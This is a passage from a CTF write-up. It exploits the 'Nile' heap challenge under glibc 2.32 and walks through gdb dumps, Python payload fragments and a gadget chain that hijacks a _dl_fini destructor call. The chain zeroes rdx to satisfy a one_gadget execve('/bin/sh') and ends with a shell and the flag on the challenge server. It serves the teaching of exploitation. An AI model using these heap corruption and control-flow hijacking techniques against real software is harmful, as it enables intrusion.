0x5555555580c0 <pro_plan>:     0x0000000000000020	0x0000000000000000 <= pro_plan_counter 0
0x5555555580d0 <pro_plan+16>:  0x0000555555557878	0x0000000000000000
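Why the counter ends up as 0 can be seen by mapping the three fields of the new entry onto the bss addresses. A sketch with the non-ASLR values from the dumps, assuming the entry layout (buffer, size, is_freed) used throughout:

```python
ENTRY_SIZE = 0x18
base = 0x555555557878        # value we wrote into the pro_plan pointer
count = 0x58                 # pro plan counter at that point

PRO_PLAN = 0x5555555580c0    # pro_plan struct: max bound at +0, counter at +8

entry = base + count * ENTRY_SIZE
fields = {
    "buffer": entry,          # lands on free_plan+24
    "size": entry + 8,        # lands on the max pro bound
    "is_freed": entry + 16,   # lands on the pro plan counter
}
print({name: hex(addr) for name, addr in fields.items()})
```

The size written is 0x20 and is_freed is 0, which matches the dump above: the max bound becomes 0x20 and the counter 0.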

Finally, time to exit and trigger our chain (and to fix it up).

Since cleanup now runs nice and clean, we’ll end up in _dl_fini, running into our fake dtors there.

$rax   : 0x000055555555d5c0  →  0x00000000deadbeef
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0x00007ffff7fe16a4  →  0xff07034908408b48
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7fe1698                  mov    rax, QWORD PTR [r15+0xa8]
   0x7ffff7fe169f                  test   rax, rax
   0x7ffff7fe16a2                  je     0x7ffff7fe16ad
●→ 0x7ffff7fe16a4                  mov    rax, QWORD PTR [rax+0x8]
   0x7ffff7fe16a8                  add    rax, QWORD PTR [r15]
   0x7ffff7fe16ab                  call   rax
   0x7ffff7fe16ad                  mov    esi, DWORD PTR [rbp-0x3c]
   0x7ffff7fe16b0                  test   esi, esi
   0x7ffff7fe16b2                  jne    0x7ffff7fe16c2
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0  →  [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0  →  0x00007fffffffdaa0  →  [loop detected]

This will now fetch the value from rax+0x8 and add the value at r15 (0x0000555555554000, which is elf base) to it, and then call it.

We previously put 0xfacebabe there, so this would now call 0x55565023fabe. Not quite right, so let’s go back there and fix that value.
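The addition can be modelled in a few lines, which also gives the value that has to be stored to reach an arbitrary address. A sketch with the non-ASLR ELF base; in the exploit the base is derived from the bss leak as PIE-0x4080, and the helper names here are made up.

```python
MASK = (1 << 64) - 1
ELF_BASE = 0x555555554000    # value at [r15], the load address of the binary


def called_address(stored):
    # mov rax, [rax+0x8] ; add rax, [r15] ; call rax
    return (stored + ELF_BASE) & MASK


def value_to_store(wanted):
    # subtract the base up front so the add lands on the wanted address
    return (wanted - ELF_BASE) & MASK


first_try = called_address(0xfacebabe)
stored = value_to_store(0x7ffffacebabe)
print(hex(first_try), hex(called_address(stored)))
```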

CALL = 0x7ffffacebabe

# overwrite free fd with ptr to pro plan again	
adddesc(0x10, p64((PIE+0x40)^GUARD))	
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))	
adddesc(0x10, p64(0xdeadbeef)+p64(CALL-(PIE-0x4080)))

$rax   : 0x7ffffacebabe
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0x00007ffff7fe16ab  →  0x75f685c4758bd0ff
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7fe16a2                  je     0x7ffff7fe16ad
●  0x7ffff7fe16a4                  mov    rax, QWORD PTR [rax+0x8]
   0x7ffff7fe16a8                  add    rax, QWORD PTR [r15]
 → 0x7ffff7fe16ab                  call   rax
   0x7ffff7fe16ad                  mov    esi, DWORD PTR [rbp-0x3c]
   0x7ffff7fe16b0                  test   esi, esi
   0x7ffff7fe16b2                  jne    0x7ffff7fe16c2
   0x7ffff7fe16b4                  mov    ecx, DWORD PTR [rip+0x1b046]        # 0x7ffff7ffc700
   0x7ffff7fe16ba                  test   ecx, ecx
─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0  →  [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0  →  0x00007fffffffdaa0  →  [loop detected]

Calling 0x7ffffacebabe… Seems, we have rip control, yay…

But wait… None of the one_gadget constraints can be fulfilled, and also none of the registers point anywhere useful to maybe do some stack pivoting =(

0xcda5d execve("/bin/sh", r12, rdx)
constraints:
  [r12] == NULL || r12 == NULL
  [rdx] == NULL || rdx == NULL

This would have been a good candidate, since r12 is already 0x0, but rdx contains an address, thus we cannot use it (for now…).

Well, this took quite some time to come up with a solution for, but after wading through countless gadgets to make anything useful from the situation, I came up with this:

0x7ffff7f2cd44:	mov    rax,QWORD PTR [r15+0x60]
0x7ffff7f2cd48:	call   QWORD PTR [rax+0x8]

$r15 is pointing to the ld region that we overwrote with our pro plan chunks.

gef➤  x/10gx 0x00007ffff7ffe1a0+0x60
0x7ffff7ffe200:	0x000055555555ee70	0x0000000000000020
0x7ffff7ffe210:	0x0000000000000000	0x000055555555d5c0
0x7ffff7ffe220:	0x0000000000000040	0x0000000000000000
0x7ffff7ffe230:	0x000055555555d610	0x0000000000000040
0x7ffff7ffe240:	0x0000000000000000	0x000055555555d5c0

gef➤  x/10gx 0x000055555555ee70
0x55555555ee70:	0x5a5a5a5a5a5a5a5a	0x00000000deadbeef
0x55555555ee80:	0x0000000000000000	0x0000000000000000
0x55555555ee90:	0x0000000000000000	0x0000000000000031
0x55555555eea0:	0x0000000000000041	0x0000000000000000
0x55555555eeb0:	0x0000000000000000	0x0000000000000000

So, yeah, that’s the reason I put that chunk there previously (hard to explain this whole mess in the right order).

By using the above gadget, we can point rax to our chunk on the heap, and it will then call the pointer stored at rax+0x8 (which currently is 0xdeadbeef). Not quite there yet, but at least we now have one more register containing an address that is under our control.
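
To make the two dereferences explicit, here is a small emulation of the gadget on a dict-based memory. It is just an illustration: `first_gadget` is a made-up helper name, and the memory contents are the values from the two `x/10gx` dumps above.

```python
# Sketch: emulate "mov rax, [r15+0x60]; call [rax+0x8]" on a dict-based memory.
# Addresses and values are taken from the gef dumps in this writeup.
memory = {
    0x7ffff7ffe200: 0x000055555555ee70,  # [r15+0x60]: heap pointer inside the overwritten ld data
    0x55555555ee70: 0x5a5a5a5a5a5a5a5a,  # "ZZZZZZZZ" filler at the start of our chunk
    0x55555555ee78: 0x00000000deadbeef,  # [rax+0x8]: placeholder call target
}
r15 = 0x00007ffff7ffe1a0

def first_gadget(r15, memory):
    rax = memory[r15 + 0x60]         # mov rax, QWORD PTR [r15+0x60]
    call_target = memory[rax + 0x8]  # call QWORD PTR [rax+0x8]
    return rax, call_target

rax, call_target = first_gadget(r15, memory)
print(hex(rax), hex(call_target))  # 0x55555555ee70 0xdeadbeef
```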

$rax   : 0x000055555555ee70  →  0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda70  →  0x00007ffff7f2cd4b  →  0x0000059a840fc085
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0xdeadbeef        
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b  →  0x0000059a840fc085	 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad  →  0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f
[!] Cannot access memory at address 0xdeadbeef

Still, we just went from one crash to another…

But, we can now branch into another gadget:

0x7ffff7e7a4c7:	mov    rdx,QWORD PTR [rbx+0x40]
0x7ffff7e7a4cb:	mov    rdi,rbx
0x7ffff7e7a4ce:	sub    rdx,rsi
0x7ffff7e7a4d1:	call   QWORD PTR [rax+0x70]

payload = "Z"*8 + p64(libc.address+0x000000000007b4c7)

addfake(20, payload)

When executing this, we land in the new gadget:

$rax   : 0x000055555555ee70  →  0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda70  →  0x00007ffff7f2cd4b  →  0x0000059a840fc085
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0x00007ffff7e7a4c7  →  0x48df894840538b48
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7e7a4ba                  cmp    rdx, r13
   0x7ffff7e7a4bd                  jae    0x7ffff7e7a718
   0x7ffff7e7a4c3                  mov    rsi, QWORD PTR [rbx+0x10]
 → 0x7ffff7e7a4c7                  mov    rdx, QWORD PTR [rbx+0x40]
   0x7ffff7e7a4cb                  mov    rdi, rbx
   0x7ffff7e7a4ce                  sub    rdx, rsi
   0x7ffff7e7a4d1                  call   QWORD PTR [rax+0x70]
   0x7ffff7e7a4d4                  test   rax, rax
   0x7ffff7e7a4d7                  jle    0x7ffff7e7a6b0
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b  →  0x0000059a840fc085	 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad  →  0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f

gef➤  x/gx $rbx+0x40
0x7ffff7ffd040:	0x0000000000000000

This moves the value at rbx+0x40 (0x0) into rdx, subtracts rsi (also 0x0) from it and then calls the pointer stored at rax+0x70. So this effectively zeroes out rdx, and we fulfill the constraints of the one_gadget from above (r12 == 0 and rdx == 0).

Remember that I put the one_gadget address in one of the fake chunks previously? Surprise, it’s now exactly at rax+0x70.
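
The register effects of this gadget can be replayed in Python as a sanity check. This is a sketch only: `second_gadget` is a hypothetical helper, the register values come from the dump above, and the `ONE_GADGET` value assumes the libc base of this debug session is 0x7ffff7dff000 and that the one_gadget pointer sits at rax+0x70.

```python
# Sketch: emulate "mov rdx,[rbx+0x40]; mov rdi,rbx; sub rdx,rsi; call [rax+0x70]".
MASK64 = (1 << 64) - 1
ONE_GADGET = 0x7ffff7dff000 + 0xcda5d  # assumed libc base of the debug session + one_gadget offset

memory = {
    0x7ffff7ffd040: 0x0,                # [rbx+0x40], as shown by "x/gx $rbx+0x40"
    0x55555555ee70 + 0x70: ONE_GADGET,  # [rax+0x70], assumed to hold the one_gadget pointer
}

def second_gadget(regs, memory):
    regs = dict(regs)                                   # do not modify the caller's dict
    regs["rdx"] = memory[regs["rbx"] + 0x40]            # mov rdx, QWORD PTR [rbx+0x40]
    regs["rdi"] = regs["rbx"]                           # mov rdi, rbx
    regs["rdx"] = (regs["rdx"] - regs["rsi"]) & MASK64  # sub rdx, rsi
    call_target = memory[regs["rax"] + 0x70]            # call QWORD PTR [rax+0x70]
    return regs, call_target

before = {
    "rax": 0x55555555ee70, "rbx": 0x7ffff7ffd000,
    "rdx": 0x555555557dd8, "rsi": 0x0, "r12": 0x0,
}
after, call_target = second_gadget(before, memory)
print(hex(after["rdx"]), hex(after["r12"]), hex(call_target))
```

Note that the trick only works because rsi is 0x0 as well; with any other rsi, the `sub` would leave a non-zero value in rdx.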
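
For reference, the address arithmetic behind this can be written down as follows. It is a rough sketch, not the code from xpl.py: the libc base is inferred from the gadget's runtime address and the offset used in the payload, and `struct.pack` stands in for pwntools' `p64` so that the snippet runs on Python 3 without extra packages.

```python
import struct

GADGET_RUNTIME = 0x7ffff7e7a4c7  # second gadget as seen in gdb
GADGET_OFFSET = 0x7b4c7          # offset used in the payload
ONE_GADGET_OFFSET = 0xcda5d      # from the one_gadget output
RAX = 0x55555555ee70             # heap chunk rax points to after the first gadget

libc_base = GADGET_RUNTIME - GADGET_OFFSET  # inferred libc base of this debug session
one_gadget = libc_base + ONE_GADGET_OFFSET  # absolute one_gadget address
slot = RAX + 0x70                           # address that has to hold the one_gadget pointer

# Python 3 equivalent of: "Z"*8 + p64(libc.address + 0x7b4c7)
payload = b"Z" * 8 + struct.pack("<Q", libc_base + GADGET_OFFSET)

print(hex(libc_base), hex(one_gadget), hex(slot), payload.hex())
```

Against the remote target, the same offsets are simply added to the leaked libc base instead of the local one.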

Finally at the end of the journey :)

$ python xpl.py 1
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to chall.polygl0ts.ch on port 3800: Done
[*] LEAK         : 0x55a9f31a0b09
[*] HEAP         : 0x55aca9d09600
[*] HEAP guard   : 0x55aca9d09
[*] LIBC leak    : 0x7fb8f7cafa60
[*] LIBC         : 0x7fb8f7aed000
[*] MAIN_ARENA   : 0x7fb8f7cafa00
[*] PIE          : 0x55aca8ac2080
[*] TARGET CHUNK : 0x7fb8f7ce61d0
[*] Paused (press any to continue)
[*] Switching to interactive mode
Goodbye! Thank you for using Nile.
$ ls
flag
ld-2.32.so
libc-2.32.so
run
$ cat flag
EPFL{Y3t_4n0th3r_h34pn0t3_th4t_w4s_1n_my_chall3ng3s_f0lder_f0r_t00_l0ng}
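
As a side note, the first three log lines of this run are consistent with glibc 2.32 safe-linking. The sketch below assumes that the leaked value is a mangled pointer `P ^ (P >> 12)`, i.e. that the pointer and the location it is stored at lie in the same page. `demangle` is a hypothetical helper; xpl.py may well compute this differently.

```python
def demangle(leak, rounds=6):
    """Recover P from leak = P ^ (P >> 12) by fixed-point iteration.

    Every round fixes another 12 bits from the top, so 6 rounds cover 64 bits.
    """
    ptr = leak
    for _ in range(rounds):
        ptr = leak ^ (ptr >> 12)
    return ptr

LEAK = 0x55a9f31a0b09  # "LEAK" line from the run above
heap = demangle(LEAK)
guard = heap >> 12     # the value that gets XORed into pointers stored in this page
print(hex(heap), hex(guard))  # 0x55aca9d09600 0x55aca9d09
```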

Phew, this challenge took a lot of time, going down so many rabbit holes and redoing the code execution part again and again. Though I was cursing a LOT in the middle of the night, I enjoyed the challenge quite a lot in hindsight.

Still, I’m quite curious about other people’s solutions, to see if it can be solved in an easier way, since this one was definitely a real pain.